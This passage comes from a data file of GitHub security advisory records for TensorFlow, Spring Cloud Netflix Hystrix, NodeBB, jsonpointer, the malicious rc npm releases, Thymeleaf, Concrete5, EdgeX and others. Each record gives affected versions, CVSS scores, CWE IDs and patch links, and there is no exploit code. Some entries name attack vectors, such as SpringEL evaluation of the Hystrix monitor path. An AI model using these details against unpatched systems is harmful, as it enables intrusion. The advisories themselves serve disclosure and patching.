operators](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/conv_ops.cc) trigger a division by 0 if passed empty filter tensor arguments. + +### Patches +We have patched the issue in GitHub commit [f2c3931113eaafe9ef558faaddd48e00a6606235](https://github.com/tensorflow/tensorflow/commit/f2c3931113eaafe9ef558faaddd48e00a6606235). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-6hpv-v2rx-c5g6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41209'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/f2c3931113eaafe9ef558faaddd48e00a6606235'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:36:05Z', 'nvd_published_at': '2021-11-05T22:15:00Z'}" +1.4.0,GHSA-gx3f-hq7p-8fxv,2021-11-22T19:53:38Z,2021-11-23T17:53:33Z,,['CVE-2021-22053'],Code injection in spring-cloud-netflix-hystrix-dashboard,"Applications using the `spring-cloud-netflix-hystrix-dashboard` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.cloud:spring-cloud-netflix-hystrix-dashboard'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.10.RELEASE'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.2.9.RELEASE'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22053'}, {'type': 'WEB', 'url': 'https://tanzu.vmware.com/security/cve-2021-22053'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T19:53:38Z', 'nvd_published_at': '2021-11-19T16:15:00Z'}" +1.4.0,GHSA-282f-qqgm-c34q,2021-11-08T17:44:31Z,2021-11-08T17:44:45Z,,['CVE-2021-23807'],Prototype Pollution in node-jsonpointer,This affects the package `jsonpointer` before `5.0.0`. A type confusion vulnerability can lead to a bypass of a previous Prototype Pollution fix when the pointer components are arrays.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'jsonpointer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23807'}, {'type': 'WEB', 'url': 'https://github.com/janl/node-jsonpointer/pull/51'}, {'type': 'WEB', 'url': 'https://github.com/janl/node-jsonpointer/commit/a0345f3550cd9c4d89f33b126390202b89510ad4'}, {'type': 'PACKAGE', 'url': 'https://github.com/janl/node-jsonpointer'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSONPOINTER-1577288'}]","{'cwe_ids': ['CWE-1321', 'CWE-843'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T16:58:08Z', 'nvd_published_at': '2021-11-03T18:15:00Z'}" +1.4.0,GHSA-wx69-rvg3-x7fc,2021-12-01T15:07:01Z,2021-11-30T22:21:01Z,,['CVE-2021-43787'],XSS via prototype pollution in NodeBB ,"### Impact +A prototype pollution vulnerability in the uploader module allowed a malicious user to inject arbitrary data (i.e. javascript) into the DOM, theoretically allowing for an account takeover when used in conjunction with a path traversal vulnerability disclosed at the same time as this report. + +### Patches +The vulnerability has been patched as of v1.18.5. + +### Workarounds +Cherry-pick commit hash 1783f918bc19568f421473824461ff2ed7755e4c to receive this patch in lieu of a full upgrade. + +### For more information +If you have any questions or comments about this advisory: +* Email us at [security@nodebb.org](mailto:security@nodebb.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nodebb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.15.0'}, {'fixed': '1.18.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/security/advisories/GHSA-wx69-rvg3-x7fc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43787'}, {'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/commit/1783f918bc19568f421473824461ff2ed7755e4c'}, {'type': 'WEB', 'url': 'https://blog.sonarsource.com/nodebb-remote-code-execution-with-one-shot/'}, {'type': 'PACKAGE', 'url': 'https://github.com/NodeBB/NodeBB'}, {'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/releases/tag/v1.18.5'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-30T14:35:09Z', 'nvd_published_at': '2021-11-29T20:15:00Z'}" +1.4.0,GHSA-g2q5-5433-rhrf,2022-09-07T22:17:03Z,2021-11-04T16:24:44Z,,[],Embedded malware in rc,"The npm package `rc` had versions published with malicious code. Users of affected versions (1.2.9, 1.3.9, and 2.3.9) should downgrade to 1.2.8 as soon as possible and check their systems for suspicious activity. +Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.",[],"[{'package': {'ecosystem': 'npm', 'name': 'rc'}, 'versions': ['1.2.9']}, {'package': {'ecosystem': 'npm', 'name': 'rc'}, 'versions': ['1.3.9']}, {'package': {'ecosystem': 'npm', 'name': 'rc'}, 'versions': ['2.3.9']}]","[{'type': 'PACKAGE', 'url': 'https://github.com/dominictarr/rc'}, {'type': 'WEB', 'url': 'https://therecord.media/malware-found-in-coa-and-rc-two-npm-packages-with-23m-weekly-downloads/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/rc'}, {'type': 'WEB', 'url': 'https://www.virustotal.com/gui/file/26451f7f6fe297adf6738295b1dcc70f7678434ef21d8b6aad5ec00beb8a72cf?nocache=1'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T16:20:31Z', 'nvd_published_at': None}" +1.4.0,GHSA-7pxj-m4jf-r6h2,2021-11-08T22:46:25Z,2021-11-10T19:12:46Z,,['CVE-2021-41203'],Missing validation during checkpoint loading,"### Impact +An attacker can trigger undefined behavior, integer overflows, segfaults and `CHECK`-fail crashes if they can change saved checkpoints from outside of TensorFlow. + +This is because the checkpoints loading infrastructure is missing validation for invalid file formats. + +### Patches +We have patched the issue in GitHub commits [b619c6f865715ca3b15ef1842b5b95edbaa710ad](https://github.com/tensorflow/tensorflow/commit/b619c6f865715ca3b15ef1842b5b95edbaa710ad), [e8dc63704c88007ee4713076605c90188d66f3d2](https://github.com/tensorflow/tensorflow/commit/e8dc63704c88007ee4713076605c90188d66f3d2), [368af875869a204b4ac552b9ddda59f6a46a56ec](https://github.com/tensorflow/tensorflow/commit/368af875869a204b4ac552b9ddda59f6a46a56ec), and [abcced051cb1bd8fb05046ac3b6023a7ebcc4578](https://github.com/tensorflow/tensorflow/commit/abcced051cb1bd8fb05046ac3b6023a7ebcc4578). + +These fixes will be included in TensorFlow 2.7.0. We will also cherrypick these commits on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-7pxj-m4jf-r6h2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41203'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/368af875869a204b4ac552b9ddda59f6a46a56ec'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/abcced051cb1bd8fb05046ac3b6023a7ebcc4578'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/b619c6f865715ca3b15ef1842b5b95edbaa710ad'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/e8dc63704c88007ee4713076605c90188d66f3d2'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-190', 'CWE-345'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:46:25Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}" +1.4.0,GHSA-qcj6-jqrg-4wp2,2021-11-18T15:13:02Z,2021-11-10T19:52:33Z,,['CVE-2021-43466'],Template injection in thymeleaf-spring5,"In the thymeleaf-spring5:3.0.12 component, thymeleaf combined with specific scenarios in template injection may lead to remote code execution.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.thymeleaf:thymeleaf-spring5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.13.RELEASE'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.0.12.RELEASE'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43466'}, {'type': 'WEB', 'url': 'https://github.com/thymeleaf/thymeleaf-spring/issues/263#issuecomment-977199524'}, {'type': 'WEB', 'url': 'https://gitee.com/wayne_wwang/wayne_wwang/blob/master/2021/10/31/ruoyi+thymeleaf-rce/index.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/thymeleaf/thymeleaf-spring'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20221014-0001/'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.186365'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:12:25Z', 'nvd_published_at': '2021-11-09T12:15:00Z'}" +1.4.0,GHSA-hf9p-9r39-r2h3,2021-11-02T18:39:03Z,2021-11-03T17:29:29Z,,['CVE-2020-11476'],Unrestricted Uploads in Concrete5,Concrete5 before 8.5.3 allows Unrestricted Upload of File with Dangerous Type such as a .phar file.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/concrete5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11476'}, {'type': 'WEB', 'url': 'https://github.com/concrete5/concrete5/pull/8713'}, {'type': 'WEB', 'url': 'https://github.com/concretecms/concretecms/commit/d296f4ba4f6ad94b199c21c1b16f0d185adab343'}, {'type': 'PACKAGE', 'url': 'https://github.com/concrete5/concrete5'}, {'type': 'WEB', 'url': 'https://github.com/concrete5/concrete5/releases/tag/8.5.3'}, {'type': 'WEB', 'url': 'https://herolab.usd.de/security-advisories/usd-2020-0041/'}]","{'cwe_ids': ['CWE-434'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-02T18:39:03Z', 'nvd_published_at': '2020-07-28T21:15:00Z'}" +1.4.0,GHSA-26cm-qrc6-mfgj,2021-11-02T18:40:07Z,2021-11-08T18:16:21Z,,['CVE-2021-41232'],Improper Neutralization of Special Elements used in an LDAP Query in stevenweathers/thunderdome-planning-poker,"### Impact +LDAP injection vulnerability, only affects instances with LDAP authentication enabled. + +### Patches +Patch for vulnerability released with v1.16.3. + +### Workarounds +Disable LDAP feature if in use + +### References +[OWASP LDAP Injection Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html +) + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [Thunderdome Github Repository](https://github.com/StevenWeathers/thunderdome-planning-poker) +* Email us at [steven@weathers.me](mailto:steven@weathers.me) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/stevenweathers/thunderdome-planning-poker'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/StevenWeathers/thunderdome-planning-poker/security/advisories/GHSA-26cm-qrc6-mfgj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41232'}, {'type': 'WEB', 'url': 'https://github.com/github/securitylab/issues/464#issuecomment-957094994'}, {'type': 'WEB', 'url': 'https://github.com/StevenWeathers/thunderdome-planning-poker/commit/f1524d01e8a0f2d6c3db5461c742456c692dd8c1'}, {'type': 'PACKAGE', 'url': 'https://github.com/StevenWeathers/thunderdome-planning-poker'}]","{'cwe_ids': ['CWE-74', 'CWE-90'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-02T18:40:07Z', 'nvd_published_at': '2021-11-02T18:15:00Z'}" +1.4.0,GHSA-x5jp-9fmm-m9pf,2021-11-17T21:11:15Z,2021-11-15T23:13:52Z,,['CVE-2021-3683'],showdoc is vulnerable to Cross-Site Request Forgery (CSRF),showdoc is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'showdoc/showdoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.9.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3683'}, {'type': 'WEB', 'url': 'https://github.com/star7th/showdoc/commit/67093c879a6563aa6ee08003177777d1975e2351'}, {'type': 'PACKAGE', 'url': 'https://github.com/star7th/showdoc'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/063a339a-5d78-40d6-a96a-6716960e8134'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T19:43:10Z', 'nvd_published_at': '2021-11-13T10:15:00Z'}" +1.4.0,GHSA-p6rw-44q7-3fw4,2021-11-03T18:13:40Z,2021-11-08T18:09:27Z,,['CVE-2021-41134'],Stored XSS in Jupyter nbdime,"### Impact + +Improper handling of user controlled input caused a stored cross-site scripting (XSS) vulnerability. All previous versions of nbdime are affected. + +### Patches + +Security patches will be released for each of the major versions of the nbdime packages since version 1.x of the nbdime python package. + +#### Python +- nbdime 1.x: Patched in v. 1.1.1 +- nbdime 2.x: Patched in v. 2.1.1 +- nbdime 3.x: Patched in v. 3.1.1 + +#### npm +- nbdime 6.x version: Patched in 6.1.2 +- nbdime 5.x version: Patched in 5.0.2 +- nbdime-jupyterlab 1.x version: Patched in 1.0.1 +- nbdime-jupyterlab 2.x version: Patched in 2.1.1 + +### For more information +If you have any questions or comments about this advisory email us at [security@ipython.org](mailto:security@ipython.org). + + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'nbdime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'nbdime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'nbdime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.1.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'nbdime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'nbdime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.1.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'nbdime-jupyterlab'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'nbdime-jupyterlab'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jupyter/nbdime/security/advisories/GHSA-p6rw-44q7-3fw4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41134'}, {'type': 'WEB', 'url': 'https://github.com/jupyter/nbdime/commit/e44a5cc7677f24b45ebafc756db49058c2f750ea'}, {'type': 'PACKAGE', 'url': 'https://github.com/jupyter/nbdime'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-03T18:13:40Z', 'nvd_published_at': '2021-11-03T18:15:00Z'}" +1.4.0,GHSA-gf2c-93hm-r9j5,2021-11-22T18:42:37Z,2021-11-23T18:16:43Z,,['CVE-2021-3963'],Cross-site Scripting in kimai2,kimai2 is vulnerable to Cross-Site Request Forgery (CSRF) in deleting invoice templates. This vulnerability is capable of tricking admin user to delete invoice templates.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'kevinpapst/kimai2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3963'}, {'type': 'WEB', 'url': 'https://github.com/kevinpapst/kimai2/commit/95796ab2560ad93f44068a88f0fad758c2053514'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/3abf308b-7dbd-4864-b1a9-5c45b876def8'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:42:37Z', 'nvd_published_at': '2021-11-19T12:15:00Z'}" +1.4.0,GHSA-ppq7-88c7-q879,2021-11-17T22:34:48Z,2021-11-17T23:42:40Z,,['CVE-2021-25976'],Cross-Site Request Forgery in PiranhaCMS,"In PiranhaCMS, versions 4.0.0-alpha1 to 9.2.0 are vulnerable to cross-site request forgery (CSRF) when performing various actions supported by the management system, such as deleting a user, deleting a role, editing a post, deleting a media folder etc., when an ID is known.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Piranha'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-alpha1'}, {'fixed': '10.0-alpha1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 9.2.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25976'}, {'type': 'WEB', 'url': 'https://github.com/PiranhaCMS/piranha.core/commit/e42abacdd0dd880ce9cf6607efcc24646ac82eda'}, {'type': 'PACKAGE', 'url': 'https://github.com/PiranhaCMS/piranha.core'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25976'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T22:34:48Z', 'nvd_published_at': '2021-11-16T09:15:00Z'}" +1.4.0,GHSA-6c7m-qwxj-mvhp,2021-11-24T19:01:48Z,2021-11-19T20:55:16Z,,['CVE-2021-41278'],Broken encryption in EdgeX Foundry,"### Summary +Broken encryption in app-functions-sdk “AES” transform in EdgeX Foundry releases prior to Jakarta allows attackers to decrypt messages via unspecified vectors. + +### Detailed Description +The app-functions-sdk exports an “aes” transform that user scripts can optionally call to encrypt data in the processing pipeline. No decrypt function is provided. Encryption is not enabled by default, but if used, the level of protection may be less than the user may expects due to a broken implementation in https://github.com/edgexfoundry/app-functions-sdk-go/blob/v1.0.0/pkg/transforms/encryption.go + +Version v2.1.0 (EdgeX Foundry Jakarta release and later) of app-functions-sdk-go/v2 deprecates the “aes” transform and provides an improved “aes256” transform in its place. The broken implementation will remain in a deprecated state until it is removed in the next EdgeX major release to avoid breakage of existing software that depends on the broken implementation. + +### Impact +As the broken transform is a library function that is not invoked by default, users who do not use the AES transform in their processing pipelines are unaffected. Those that are affected are urged to upgrade to the Jakarta EdgeX release and modify processing pipelines to use the new ""aes256"" transform. + +#### Vulnerable go modules +- github.com/edgexfoundry/app-functions-sdk-go < v2.1.0 +- github.com/edgexfoundry/app-functions-sdk-go/v2 < v2.1.0 +- github.com/edgexfoundry/app-service-configurable < v2.1.0 + +#### Vulnerable containers +- https://hub.docker.com/r/edgexfoundry/app-service-configurable >= 2.0.0 < v2.1.0 +- https://hub.docker.com/r/edgexfoundry/app-service-configurable-arm64 >= 2.0.0 < 2.1.0 +- https://hub.docker.com/r/edgexfoundry/docker-app-service-configurable < 2.0.0 +- https://hub.docker.com/r/edgexfoundry/docker-app-service-configurable-arm64 < 2.0.0 + +#### Vulnerable Snaps +- https://snapcraft.io/edgex-app-service-configurable >= 2.0.0 < 2.1.0 + +### Patches +Upgrade to 2.1.0 version of app-functions-sdk-go/v2, app-service-configurable, and related docker containers shown below and modify user scripts to use the new ""aes256"" transform in place of the existing ""aes"" transform. + +#### Patched go modules +- github.com/edgexfoundry/app-functions-sdk-go/v2 v2.1.0 +- github.com/edgexfoundry/app-service-configurable v2.1.0 + +Modification of user scripts is necessary for full remediation. + +#### Patched containers +- https://hub.docker.com/r/edgexfoundry/app-service-configurable:>=2.1.0 +- https://hub.docker.com/r/edgexfoundry/app-service-configurable-arm64:>=2.1.0 + +Modification of user scripts is necessary for full remediation. + +#### Patched Snaps +- https://snapcraft.io/edgex-app-service-configurable >= 2.1.0 + +Modification of user scripts is necessary for full remediation. + +### Workarounds +If unable to upgrade, change the processing pipeline to use an HTTPS (TLS 1.3) endpoint to export and skip encryption. + +### References +* [2.0 documentation](https://docs.edgexfoundry.org/2.0/microservices/application/BuiltIn/#aes) +* [2.1 documentation](https://docs.edgexfoundry.org/2.1/microservices/application/BuiltIn/#encryption-deprecated) +* [GitHub issue](https://github.com/edgexfoundry/app-functions-sdk-go/issues/968) + +### For more information +If you have any questions or comments about this advisory: +* Contact us in the [Slack #security channel](https://slack.edgexfoundry.org/) +* Open an issue in [edgex-go](https://github.com/edgexfoundry/edgex-go) +* Email us at [EdgeX-TSC-Security@lists.edgexfoundry.org](mailto:EdgeX-TSC-Security@lists.edgexfoundry.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/edgexfoundry/app-functions-sdk-go/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/edgexfoundry/app-functions-sdk-go'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 2.1.0'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/edgexfoundry/app-service-configurable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/edgexfoundry/app-functions-sdk-go/security/advisories/GHSA-6c7m-qwxj-mvhp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41278'}, {'type': 'WEB', 'url': 'https://github.com/edgexfoundry/app-functions-sdk-go/commit/8fa13c6388ce76a6b878b54490eac61aa7d81165'}, {'type': 'PACKAGE', 'url': 'https://github.com/edgexfoundry/app-functions-sdk-go'}]","{'cwe_ids': ['CWE-327'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-18T23:05:06Z', 'nvd_published_at': '2021-11-19T00:15:00Z'}" +1.4.0,GHSA-gqpw-9q54-9x28,2021-11-22T18:24:09Z,2021-11-23T18:18:43Z,,['CVE-2021-22970'],Server-Side Request Forgery in Concrete CMS,Concrete CMS (formerly concrete5) versions 8.5.6 and below and version 9.0.0 allow local IP importing causing the system to be vulnerable to SSRF attacks on the private LAN to servers by reading files from the local LAN. An attacker can pivot in the private LAN and exploit local network appsandb.,[],"[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': 